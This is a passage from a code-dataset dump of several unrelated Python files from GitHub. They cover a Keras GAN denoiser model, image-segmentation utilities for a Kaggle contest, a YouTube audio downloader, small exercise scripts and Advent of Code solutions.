)(c_input)\n return c_output\n\n ################################################\n\n # The generator takes a noisy image as input\n noisy_img = keras.layers.Input(config.DENOISER_INPUT_SHAPE, name=\"Generator_input\")\n\n # 9 fully convolutional layers\n x = convLayer(noisy_img, 100)\n x = keras.layers.ReLU()(x)\n for _ in range(layers):\n x = convLayer(x, 100)\n if bn:\n x = keras.layers.BatchNormalization()(x)\n x = keras.layers.ReLU()(x)\n\n # Final layer is not activated\n if kpcn:\n weights = convLayer(x, pow(kpcn_size, 2))\n else:\n weights = convLayer(x, 3)\n\n return keras.models.Model(noisy_img, weights, name=\"Generator\")\n\ndef buildCritic():\n \"\"\"Build and return the critic for use in th GAN.\"\"\"\n def convBlock(c_input, num_filters, strides):\n \"\"\"Helper function for a convolutional block. 
Includes LeakyReLU\n activation.\"\"\"\n c_output = keras.layers.Conv2D(\n filters=num_filters,\n kernel_size=[3, 3],\n strides=strides,\n padding=\"SAME\"\n )(c_input)\n\n output = keras.layers.LeakyReLU(alpha=0.2)(c_output)\n\n return output\n\n ################################################\n\n img = keras.layers.Input(shape=config.IMG_SHAPE, name=\"Critic_input\")\n\n x = convBlock(img, 64, strides=[1, 1])\n x = convBlock(x, 64, strides=[2, 2])\n x = keras.layers.Dropout(0.4)(x)\n x = convBlock(x, 128, strides=[1, 1])\n x = convBlock(x, 128, strides=[2, 2])\n x = keras.layers.Dropout(0.4)(x)\n x = convBlock(x, 256, strides=[1, 1])\n x = convBlock(x, 256, strides=[2, 2])\n x = keras.layers.Dropout(0.4)(x)\n x = convBlock(x, 512, strides=[1, 1])\n x = convBlock(x, 512, strides=[2, 2])\n x = keras.layers.Dropout(0.4)(x)\n\n #x = keras.layers.Dense(1024)(x)\n #x = keras.layers.Dropout(0.5)(x)\n x = keras.layers.LeakyReLU(alpha=0.2)(x)\n x = keras.layers.Flatten()(x)\n x = keras.layers.Dense(1)(x)\n\n return keras.models.Model(img, x, name=\"Critic\")\n\n\ndef buildDiscriminator():\n \"\"\"Build and return the discriminator for use in vanilla GAN.\"\"\"\n def convBlock(c_input, num_filters, strides, bn=True):\n \"\"\"Helper function for a convolutional block.\"\"\"\n c_output = keras.layers.Conv2D(\n filters=num_filters,\n kernel_size=[3, 3],\n strides=strides,\n padding=\"SAME\"\n )(c_input)\n\n output = keras.layers.LeakyReLU(alpha=0.2)(c_output)\n\n if bn:\n output = keras.layers.BatchNormalization(momentum=0.8)(output)\n\n return output\n\n ################################################\n\n img = keras.layers.Input(shape=config.IMG_SHAPE, name=\"Discriminator_input\")\n\n x = convBlock(img, 64, strides=[1, 1], bn=False)\n x = convBlock(x, 64, strides=[2, 2])\n x = convBlock(x, 128, strides=[1, 1])\n x = convBlock(x, 128, strides=[2, 2])\n x = convBlock(x, 256, strides=[1, 1])\n x = convBlock(x, 256, strides=[2, 2])\n x = convBlock(x, 512, strides=[1, 1])\n x = convBlock(x, 512, strides=[2, 2])\n\n x = keras.layers.Dense(1024)(x)\n x = keras.layers.LeakyReLU(alpha=0.2)(x)\n x = keras.layers.Flatten()(x)\n prob = keras.layers.Dense(1, activation='sigmoid')(x)\n\n return keras.models.Model(img, prob, name=\"Discriminator\")\n\n","repo_name":"jamesTait-jt/monte-carlo-denoiser","sub_path":"denoiser/code/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":4417,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"32595763600","text":"import cv2\nimport torch\nimport numpy as np\nfrom imgaug import augmenters as iaa\nfrom pycocotools import mask as cocomask\nimport pandas as pd\nfrom src.config import *\nimport matplotlib.pyplot as plt\n\n\ndef load_image(path, mask=False, aug=None):\n \"\"\"\n Load image from a given path and pad it on the sides, so that each side is divisible by 32 (network requirement)\n\n if mask is True:\n returns the binary mask as a torch float tensor of shape [1, H, W]\n else:\n returns the normalized image as a torch float tensor of shape [3, H, W]\n \"\"\"\n\n img = cv2.imread(str(path))\n img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)\n\n if aug:\n img = aug.augment_images([img])[0]\n\n height, width, _ = img.shape\n\n # Padding is needed for UNet models because they need image size to be divisible by 32\n if height % 32 == 0:\n y_min_pad = 0\n y_max_pad = 0\n else:\n y_pad = 32 - height % 32\n y_min_pad = int(y_pad / 2)\n y_max_pad = y_pad - y_min_pad\n\n if width % 32 == 0:\n 
x_min_pad = 0\n x_max_pad = 0\n else:\n x_pad = 32 - width % 32\n x_min_pad = int(x_pad / 2)\n x_max_pad = x_pad - x_min_pad\n # plt.subplot(121)\n # plt.imshow(img)\n img = cv2.copyMakeBorder(img, y_min_pad, y_max_pad, x_min_pad, x_max_pad, cv2.BORDER_REFLECT_101)\n # plt.subplot(122)\n # plt.imshow(img)\n # plt.show()\n if mask:\n # Convert mask to 0 and 1 format\n img = img[:, :, 0:1] // 255\n return torch.from_numpy(img).float().permute([2, 0, 1])\n else:\n img = img / 255.0\n return torch.from_numpy(img).float().permute([2, 0, 1])\n\n\ndef rle_encoding(x):\n dots = np.where(x.T.flatten() == 1)[0]\n run_lengths = []\n prev = -2\n for b in dots:\n if (b > prev + 1): run_lengths.extend((b + 1, 0))\n run_lengths[-1] += 1\n prev = b\n return run_lengths\n\n\ndef save_checkpoint(model, extra, checkpoint, optimizer=None):\n state = {'state_dict': model.state_dict(),\n 'extra': extra}\n if optimizer:\n state['optimizer'] = optimizer.state_dict()\n\n torch.save(state, CHECKPOINT_DIR + checkpoint)\n\n print('model saved to %s' % (CHECKPOINT_DIR + checkpoint))\n\n\ndef load_checkpoint(model, checkpoint, optimizer=None):\n state = torch.load(CHECKPOINT_DIR + checkpoint)\n # del state['state_dict']['final.weight']\n # del state['state_dict']['final.bias']\n model.load_state_dict(state['state_dict'], strict=False)\n optimizer_state = state.get('optimizer')\n if optimizer and optimizer_state:\n optimizer.load_state_dict(optimizer_state)\n\n print(\"Checkpoint loaded: %s \" % state['extra'])\n return state['extra']\n\n\ndef get_paddings():\n height, width = IMAGE_PADDED, IMAGE_PADDED\n if height % 32 == 0:\n y_min_pad = 0\n y_max_pad = 0\n else:\n y_pad = 32 - height % 32\n y_min_pad = int(y_pad / 2)\n y_max_pad = y_pad - y_min_pad\n if width % 32 == 0:\n x_min_pad = 0\n x_max_pad = 0\n else:\n x_pad = 32 - width % 32\n x_min_pad = int(x_pad / 2)\n x_max_pad = x_pad - x_min_pad\n return x_max_pad, x_min_pad, y_max_pad, y_min_pad\n\n\ndef build_submission(binary_prediction, test_file_list):\n all_masks = []\n for p_mask in list(binary_prediction):\n p_mask = rle_encoding(p_mask)\n all_masks.append(' '.join(map(str, p_mask)))\n submit = pd.DataFrame([test_file_list, all_masks]).T\n submit.columns = ['id', 'rle_mask']\n return submit\n\n\ndef crop_to_original_size(predictions):\n x_max_pad, x_min_pad, y_max_pad, y_min_pad = get_paddings()\n stacked_predictions = np.vstack(predictions)[:, 0, :, :]\n stacked_predictions = stacked_predictions[:, y_min_pad:IMAGE_TOTAL_SIZE - y_max_pad,\n x_min_pad:IMAGE_TOTAL_SIZE - x_max_pad]\n return stacked_predictions\n","repo_name":"AChepurnoi/kaggle-tgs-salt","sub_path":"src/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":3886,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"24457485949","text":"def main():\n x = get_int(\"What's x? \")\n print(f\"You've entered: {x}\")\n \ndef get_int(prompt):\n while True:\n try:\n x = int(input(prompt))\n except ValueError:\n print(\"That's not a number! 
Try again.\") # pass can be used here\n else:\n break\n\n return x\n \n \nmain()\n","repo_name":"eugeneayonga/CS50P","sub_path":"exceptions.py","file_name":"exceptions.py","file_ext":"py","file_size_in_byte":337,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"72962938000","text":"# importing packages\r\nfrom pytube import YouTube\r\nimport os\r\n\r\n\r\n\r\ndef download(url):\r\n# url input from user\r\n yt = YouTube(str(url))\r\n\r\n # extract only audio\r\n video = yt.streams.filter(only_audio=True).first()\r\n \r\n # check for destination to save file\r\n \r\n destination = './'\r\n\r\n # download the file\r\n out_file = video.download(output_path=destination)\r\n\r\n # save the file\r\n base, ext = os.path.splitext(out_file)\r\n new_file = base + '.mp3'\r\n os.rename(out_file, new_file)\r\n\r\n\r\n # result of success\r\n \r\n return new_file\r\n\r\n","repo_name":"yasir-dev1/Speech-To-Text-1","sub_path":"Downloader.py","file_name":"Downloader.py","file_ext":"py","file_size_in_byte":573,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"72833850000","text":"\"\"\"\nDay 12 initial solution\nBenjamin Wheeler\n\"\"\"\nimport turtle\n\n\ndef part1(directions=None) -> int:\n if not directions:\n with open('day12.input', 'r') as f:\n directions = f.read()\n\n directions = directions.splitlines()\n\n # Utilize a Turtle to follow the instructions!\n s = turtle.Screen()\n s.screensize(1200, 1600)\n\n t = turtle.Turtle()\n\n movements = {\n 'N': lambda dist: t.sety(t.ycor() + dist),\n 'S': lambda dist: t.sety(t.ycor() - dist),\n 'E': lambda dist: t.setx(t.xcor() + dist),\n 'W': lambda dist: t.setx(t.xcor() - dist),\n 'L': lambda deg: t.left(deg),\n 'R': lambda deg: t.right(deg),\n 'F': lambda dist: t.forward(dist)\n }\n\n for direction in directions:\n command, *arg = direction\n arg = int(''.join(arg))\n\n # Run the command\n movements[command](arg)\n\n # print('Turtle is done, you can now close the window.')\n # turtle.done()\n\n # Return the Manhattan distance.\n return abs(int(t.xcor())) + abs(int(t.ycor()))\n\n\nif __name__ == '__main__':\n print(f'Running day 12...')\n answer = part1()\n print('Part 1:', answer)\n\n print('Done.')\n\n","repo_name":"benjamin051000/adventofcode","sub_path":"2020/day12/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":1183,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"40429638092","text":"# I dislike this solution even more but it's pretty funny\nfile = open(\"input.txt\", \"r\")\nfileLines = [line.strip(\"\\n\") for line in file.readlines()]\n\n# Structure for each subarray: Lose, Draw, Win\nveryBadList = [[\"Z\", \"X\", \"Y\"], [\"X\", \"Y\", \"Z\"], [\"Y\", \"Z\", \"X\"]]\n\nscoreStep1 = 0\nscoreStep2 = 0\n\nfor line in fileLines:\n inputA,inputB = line.split()[0], line.split()[1]\n scoreStep1 += veryBadList[ord(inputA) - 65].index(inputB) * 3 + ord(inputB) - 87\n scoreStep2 += (3 * (ord(inputB) - 88)) + ord(veryBadList[ord(inputA) - 65][ord(inputB) - 88]) - 87\n\nprint(scoreStep1)\nprint(scoreStep2)","repo_name":"leifkemp-bjss/aoc-2022","sub_path":"day2/day2-alternate.py","file_name":"day2-alternate.py","file_ext":"py","file_size_in_byte":594,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"22611766657","text":"import re\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport 
os\nimport argparse\nimport sys\n\nnum_pattern = r'[-]?\\d+(\\.\\d+)?([e][\\+\\-]\\d+)?'\n\nbase = \"results\"\n\nfilenames = [\n \"graham_scan_increasing_points.csv\",\n \"jarvis_time_increasing_points.csv\",\n \"graham_time_vertices.csv\",\n \"jarvis_time_vertices.csv\"\n]\n\nfor i in range(len(filenames)):\n filenames[i] = os.path.join(base, filenames[i])\n\n\ndef _check_pattern(line, pattern):\n \"\"\"\n Checks that line matches the given pattern. Returns the match's\n groupdict if it does, False otherwise.\n \"\"\"\n r = re.match(pattern, line)\n if r:\n return r.groupdict()\n else:\n return False\n\n\ndef is_point_time(line):\n \"\"\"\n \"\"\"\n constant_pattern = r'(?P\\d+)[,]?\\s+(?P\\d+)[,]?\\s+(?P